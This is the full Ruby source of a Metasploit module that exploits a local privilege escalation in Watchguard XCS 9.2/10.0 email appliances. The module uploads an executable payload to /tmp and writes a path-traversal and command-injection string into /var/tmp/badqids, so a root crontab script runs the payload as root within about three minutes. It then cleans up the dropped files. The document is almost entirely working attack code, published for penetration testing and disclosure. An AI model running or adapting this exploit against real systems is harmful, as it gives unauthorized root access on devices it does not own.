Watchguard XCS - FixCorruptMail Privilege Escalation (Metasploit)

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


require 'msf/core'

class Metasploit4 < Msf::Exploit::Local
  # It needs 3 minutes wait time
  # WfsDelay set to 180, so it should be a Manual exploit,
  # to avoid it being included in automations
  Rank = ManualRanking

  include Msf::Exploit::EXE
  include Msf::Post::File
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Watchguard XCS FixCorruptMail Local Privilege Escalation',
      'Description'    => %q{
        This module exploits a vulnerability in the Watchguard XCS 'FixCorruptMail' script called
        by root's crontab which can be exploited to run a command as root within 3 minutes.
      },
      'Author'         =>
        [
          'Daniel Jensen <daniel.jensen[at]security-assessment.com>' # discovery and Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['URL', 'http://security-assessment.com/files/documents/advisory/Watchguard-XCS-final.pdf']
        ],
      'Platform'       => 'bsd',
      'Arch'           => ARCH_X86_64,
      'SessionTypes'   => ['shell'],
      'Privileged'     => true,
      'Targets'        =>
        [
          [ 'Watchguard XCS 9.2/10.0', { }]
        ],
      'DefaultOptions' => { 'WfsDelay' => 180 },
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jun 29 2015'
    ))
  end

  def setup
    @pl = generate_payload_exe
    if @pl.nil?
      fail_with(Failure::BadConfig, 'Please select a native bsd payload')
    end

    super
  end

  def check
    #Basic check to see if the device is a Watchguard XCS
    res = cmd_exec('uname -a')
    return Exploit::CheckCode::Detected if res && res.include?('support-xcs@watchguard.com')

    Exploit::CheckCode::Safe
  end

  def upload_payload
    fname = "/tmp/#{Rex::Text.rand_text_alpha(5)}"

    write_file(fname, @pl)
    return nil unless file_exist?(fname)
    cmd_exec("chmod +x #{fname}")

    fname
  end

  def exploit
    print_warning('Rooting can take up to 3 minutes.')

    #Generate and upload the payload
    filename = upload_payload
    fail_with(Failure::NotFound, 'Payload failed to upload') if filename.nil?
    print_status("Payload #{filename} uploaded.")

    #Sets up empty dummy file needed for privesc
    dummy_filename = "/tmp/#{Rex::Text.rand_text_alpha(5)}"
    cmd_exec("touch #{dummy_filename}")
    vprint_status('Added dummy file')

    #Put the shell injection line into badqids
    #setup_privesc = "echo \"../../../../../..#{dummy_filename};#{filename}\" > /var/tmp/badqids"
    badqids = write_file('/var/tmp/badqids', "../../../../../..#{dummy_filename};#{filename}")
    fail_with(Failure::NotFound, 'Failed to create badqids file to exploit crontab') if badqids.nil?
    print_status('Badqids created, waiting for vulnerable script to be called by crontab...')
    #cmd_exec(setup_privesc)

    #Cleanup the files we used
    register_file_for_cleanup('/var/tmp/badqids')
    register_file_for_cleanup(dummy_filename)
    register_file_for_cleanup(filename)
  end

end